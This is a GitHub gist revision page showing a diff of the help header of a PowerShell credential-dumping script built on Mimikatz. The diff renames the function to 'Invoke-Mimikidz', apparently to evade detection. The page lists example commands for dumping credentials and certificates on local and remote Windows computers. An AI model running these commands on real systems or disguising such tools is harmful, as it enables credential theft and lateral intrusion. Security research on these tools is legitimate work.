Last active
August 31, 2018 18:35
-
-
Save tandasat/a9d0ef3b5b3c7067443e7cd1abb56536 to your computer and use it in GitHub Desktop.
Revisions
-
tandasat revised this gist
Feb 17, 2017 . 1 changed file with 4 additions and 5 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -9,7 +9,7 @@ The script has a ComputerName parameter which allows it to be executed against m This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. Function: Invoke-Mimikidz Author: Joe Bialek, Twitter: @JosephBialek Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: [email protected]. Twitter @gentilkiwi License: http://creativecommons.org/licenses/by/3.0/fr/ @@ -41,17 +41,17 @@ Optional, an array of computernames to run the script on. .EXAMPLE Execute mimikatz on the local computer to dump certificates. Invoke-Mimikidz -DumpCerts .EXAMPLE Execute mimikatz on two remote computers to dump credentials. Invoke-Mimikidz -DumpCreds -ComputerName @("computer1", "computer2") .EXAMPLE Execute mimikatz on a remote computer with the custom command "privilege::debug exit" which simply requests debug privilege and exits Invoke-Mimikidz -Command "privilege::debug exit" -ComputerName "computer1" .NOTES This script was created by combining the Invoke-ReflectivePEInjection script written by Joe Bialek and the Mimikatz code written by Benjamin DELPY @@ -2742,4 +2742,3 @@ Function Main Main } -
tandasat created this gist
Feb 17, 2017 .There are no files selected for viewing